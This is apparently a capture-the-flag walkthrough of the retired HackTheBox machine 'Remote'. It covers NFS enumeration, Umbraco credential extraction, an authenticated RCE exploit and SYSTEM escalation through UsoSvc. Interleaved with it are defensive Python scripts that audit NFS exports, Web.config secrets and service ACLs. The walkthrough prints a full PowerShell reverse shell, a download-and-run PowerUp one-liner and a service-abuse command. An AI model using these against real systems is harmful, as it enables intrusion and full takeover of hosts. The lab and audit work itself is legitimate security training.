HackTheBox. Remote walkthrough. NFS, RCE in CMS Umbraco and LPE via UsoSvc



I continue to publish walkthroughs of retired machines from the HackTheBox site.



In this article, we dig into an NFS share, deal with an RCE exploit for the CMS Umbraco and find an LPE vector via UsoSvc using PowerUp.



The connection to the lab is via VPN. It is recommended not to connect from a work computer or from a host holding data that matters to you, since you end up on a private network with people who know a thing or two about information security.






Recon



This machine has the IP address 10.10.10.180, which I add to /etc/hosts.



10.10.10.180 	remote.htb


The first step is to scan open ports. Since scanning all ports with nmap takes a long time, I first do it with masscan. We scan all TCP and UDP ports from the tun0 interface at 500 packets per second.



masscan -e tun0 -p1-65535,U:1-65535 10.10.10.180 --rate=500






Many ports are open on the host. Now let's scan them with nmap to filter out the ones we need.

nmap remote.htb -p49680,49667,49666,49665,80,139,49678,5985,135,49679,111,445,47001,2049,49664,21






Now, to get more detailed information about the services that run on the ports, run a scan with the -A option.



nmap -A remote.htb -p49680,49667,49666,49665,80,139,49678,5985,135,49679,111,445,47001,2049,49664,21






Port 111 (rpcbind/portmapper) is used by NFS, which allows remote file systems to be mounted over the network; port 2049 is the NFS service itself. Let's list the exported shares.







There is an export available to us, so let's mount it.
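From the defender's side, a share that an arbitrary client can mount is a server-side configuration problem. The following is an added example (my own, not code from the write-up) that parses an /etc/exports file and flags exports open to every client, writable by everyone, or exported with no_root_squash or insecure; the exports file it reads is constructed for the example.

```python
import re

# Constructed /etc/exports sample (not taken from the machine in the write-up).
SAMPLE_EXPORTS = """\
# backup share that any client on the network can mount
/backups        *(ro,sync,no_subtree_check)
/home/projects  10.10.10.0/24(ro,sync,root_squash)
/srv/uploads    *(rw,sync,no_root_squash)
/srv/data       192.168.1.5(rw,sync) (ro)
"""

# "host(options)" - the host part may be empty, which exports(5) treats as every client
CLIENT_RE = re.compile(r"([^(]*)(?:\(([^)]*)\))?")


def parse_exports(text):
    """Return (path, client, options) triples, one per client entry."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        parts = line.split()
        path, clients = parts[0], parts[1:] or ["*"]   # a bare path means everyone
        for spec in clients:
            m = CLIENT_RE.fullmatch(spec)
            if not m:                                   # malformed entry, skip it
                continue
            client = m.group(1) or "*"
            opts = {o for o in (m.group(2) or "").split(",") if o}
            entries.append((path, client, opts))
    return entries


def audit_exports(text):
    """Flag exports a defender would want to tighten."""
    findings = []
    for path, client, opts in parse_exports(text):
        reasons = []
        everyone = client == "*"
        if everyone:
            reasons.append("exported to every client")
        if everyone and "rw" in opts:
            reasons.append("writable by every client")
        if "no_root_squash" in opts:
            reasons.append("no_root_squash: a remote root keeps uid 0 on the share")
        if "insecure" in opts:
            reasons.append("insecure: requests from non-privileged ports accepted")
        if reasons:
            findings.append({"path": path, "client": client, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_exports(SAMPLE_EXPORTS):
        print(f"{f['path']} [{f['client']}]: " + "; ".join(f["reasons"]))
```

Run against a real server's /etc/exports, every finding is a candidate for restricting the client list to the hosts that actually need the share.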







And in this directory we find Web.config and the Umbraco folder. Umbraco is an open source content management system platform.







So we need to look through all the configs and find out the Umbraco version. Here is what stands out in Web.config.











We find SMTP credentials and the Umbraco version, 7.12.4, which is vulnerable provided we have credentials.
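The reason the share matters is that Web.config carries both the version of the CMS and clear-text credentials. As an added example (mine, not from the write-up), the script below parses a Web.config, reports the Umbraco version and lists where credentials are stored in the clear, so an administrator can find them before an exposed backup does. It assumes the Umbraco 7 layout, where the version sits in the umbracoConfigurationStatus app setting; the config it reads is constructed and all values in it are made up.

```python
import xml.etree.ElementTree as ET

# Constructed Web.config fragment laid out the way Umbraco 7 sites ship it
# (assumption about the layout; every value here is made up).
SAMPLE_WEB_CONFIG = """\
<configuration>
  <appSettings>
    <add key="umbracoConfigurationStatus" value="7.12.4" />
    <add key="umbracoReservedPaths" value="~/install/,~/config/" />
    <add key="ExternalApiKey" value="" />
  </appSettings>
  <connectionStrings>
    <add name="umbracoDbDSN"
         connectionString="Server=.;Database=umbraco;User ID=sa;Password=Constructed1"
         providerName="System.Data.SqlClient" />
  </connectionStrings>
  <system.net>
    <mailSettings>
      <smtp from="noreply@example.invalid">
        <network host="mail.example.invalid" port="25"
                 userName="smtpuser" password="Constructed2" />
      </smtp>
    </mailSettings>
  </system.net>
</configuration>
"""

SECRET_WORDS = ("password", "pwd", "secret", "apikey", "token")


def umbraco_version(root):
    """Umbraco 7 records its version in the umbracoConfigurationStatus app setting."""
    for add in root.iterfind("./appSettings/add"):
        if add.get("key") == "umbracoConfigurationStatus":
            return add.get("value")
    return None


def find_plaintext_secrets(root):
    """Report where a credential is stored in clear text (location only, never the value)."""
    hits = []
    for add in root.iterfind("./appSettings/add"):          # suspicious app settings
        key = add.get("key", "")
        if add.get("value") and any(w in key.lower() for w in SECRET_WORDS):
            hits.append({"where": "appSettings", "field": key})
    for add in root.iterfind("./connectionStrings/add"):    # passwords in connection strings
        for part in add.get("connectionString", "").split(";"):
            name, _, value = part.partition("=")
            if name.strip().lower() in ("password", "pwd") and value.strip():
                hits.append({"where": f"connectionStrings/{add.get('name')}",
                             "field": name.strip()})
    for net in root.iter("network"):                        # SMTP credentials under mailSettings
        if net.get("password"):
            hits.append({"where": "mailSettings/smtp/network", "field": "password"})
    return hits


def audit_web_config(text):
    root = ET.fromstring(text)
    return {"umbraco_version": umbraco_version(root),
            "secrets": find_plaintext_secrets(root)}


if __name__ == "__main__":
    print(audit_web_config(SAMPLE_WEB_CONFIG))
```

Each hit is a place where the credential should move out of the config (protected configuration sections, an integrated login for the database, or a secrets store), and the version is what you compare against the vendor's advisories.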



Entry Point







Next, I listed all the files and directories on the remote share in order to pick out the ones worth looking at.

ls -lR ./


















Once the set of files is narrowed down, look through them (a quick grep for strings such as user, login, pass, vers, etc. helps). This is how we learn that two users exist:











After that, we grep again for the strings admin and ssmith. And we find the users' password hashes.











And successfully crack the administrator's password.







A ready-made exploit exists in the exploit-db database, but it needs a few changes.







USER



First, we specify the credentials and the host.







Second, we change the payload by specifying the executable and its arguments. For the test we use ping.







As soon as the program runs, we see ICMP packets in tcpdump.











Let's use the following reverse shell as the payload:

$client = New-Object System.Net.Sockets.TCPClient('10.10.15.60',4321)
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)
    $sendback = (iex $data 2>&1 | Out-String )
    $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
    $stream.Write($sendbyte,0,$sendbyte.Length)
    $stream.Flush()
}
$client.Close()




Let's save it as shell.ps1 and start an HTTP server on the local machine.

sudo python3 -m http.server


Let's change the payload.







And after executing it, we get a connection back.







There are no user directories on the server, so we find the flag in the Public directory.







ROOT



Having looked at the information about the user, we notice an interesting privilege.







But since this is Windows Server 2019, token impersonation will not work for LPE here.







Let's use PowerUp to find an LPE vector. We download it from our own host and run the full set of checks.

iex (New-Object Net.WebClient).DownloadString('http://10.10.15.60/tools/PowerUp.ps1');Invoke-AllChecks






And we have permissions on the Update Orchestrator Service (UsoSvc). Update Orchestrator is the service that organizes Windows updates: it is responsible for downloading, installing and checking for updates on the computer.
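What PowerUp reports here is a service whose DACL lets a low-privileged principal change its configuration. The following added example (my own, not code from the write-up or from PowerUp) parses service security descriptors in the SDDL form that `sc.exe sdshow <service>` prints and flags allow ACEs that give broad groups such as Authenticated Users or Everyone the right to reconfigure the service. The SDDL strings in it are constructed; the real descriptor from the machine is not shown in the write-up.

```python
import re

# Constructed SDDL strings in the form `sc.exe sdshow <service>` prints them
# (assumption; not captured from the machine in the write-up).
SAMPLE_SDDL = {
    # typical default: only SYSTEM (SY) and Administrators (BA) may reconfigure
    "Spooler": "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
               "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)",
    # weak: Authenticated Users (AU) also hold DC (change config) plus RP/WP (start/stop)
    "UsoSvc": "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
              "(A;;CCDCLCSWRPWPLOCRRC;;;AU)",
}

# Rights that let a principal rewrite the service definition or its ACL.
DANGEROUS = {"DC": "SERVICE_CHANGE_CONFIG", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
             "SD": "DELETE", "GA": "GENERIC_ALL", "GW": "GENERIC_WRITE"}
# The same rights as access-mask bits, for ACEs that carry a numeric mask.
MASK_BITS = {0x0002: "DC", 0x10000: "SD", 0x40000: "WD", 0x80000: "WO",
             0x10000000: "GA", 0x40000000: "GW"}
# Well-known SID abbreviations that mean "more or less anyone on the box".
BROAD = {"AU": "Authenticated Users", "WD": "Everyone", "BU": "Users",
         "IU": "Interactive Users", "AN": "Anonymous"}

ACE_RE = re.compile(r"\(([^)]*)\)")


def parse_dacl(sddl):
    """Return (ace_type, rights, sid) for each ACE in the DACL part of an SDDL string."""
    dacl = sddl.split("D:", 1)[1] if "D:" in sddl else ""
    dacl = dacl.split("S:", 1)[0]          # drop the SACL if present
    aces = []
    for body in ACE_RE.findall(dacl):
        fields = body.split(";")
        if len(fields) != 6:               # type;flags;rights;object;inherit;sid
            continue
        aces.append((fields[0], fields[2], fields[5]))
    return aces


def decode_rights(rights):
    """Return the set of two-letter right codes; numeric masks are mapped to codes."""
    if rights.lower().startswith("0x"):
        mask = int(rights, 16)
        return {code for bit, code in MASK_BITS.items() if mask & bit}
    return {rights[i:i + 2] for i in range(0, len(rights), 2)}


def audit_service_sddl(name, sddl):
    """List broad principals that can reconfigure the service (allow ACEs only)."""
    findings = []
    for ace_type, rights, sid in parse_dacl(sddl):
        if ace_type != "A" or sid not in BROAD:
            continue
        bad = sorted(DANGEROUS[c] for c in decode_rights(rights) if c in DANGEROUS)
        if bad:
            findings.append({"service": name, "principal": BROAD[sid], "rights": bad})
    return findings


def audit_all(sddl_by_service):
    return [f for name, sddl in sddl_by_service.items()
            for f in audit_service_sddl(name, sddl)]


if __name__ == "__main__":
    for f in audit_all(SAMPLE_SDDL):
        print(f"{f['service']}: {f['principal']} holds {', '.join(f['rights'])}")
```

A finding means the DACL should be tightened so that only SYSTEM and Administrators hold SERVICE_CHANGE_CONFIG, WRITE_DAC and WRITE_OWNER; start and stop rights for ordinary users are harmless on their own, it is the ability to change the binary path that turns a service into a privilege escalation path.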



Let's create a second shell (the same script with a different port) and upload it to the machine.

wget http://10.10.15.60/shell2.ps1 -O C:\Windows\Temp\shell2.ps1


And now let's run it through UsoSvc.

Invoke-ServiceAbuse -Name UsoSvc -Command "cmd.exe /c powershell C:\Windows\Temp\shell2.ps1"






And we get a connection back as SYSTEM.









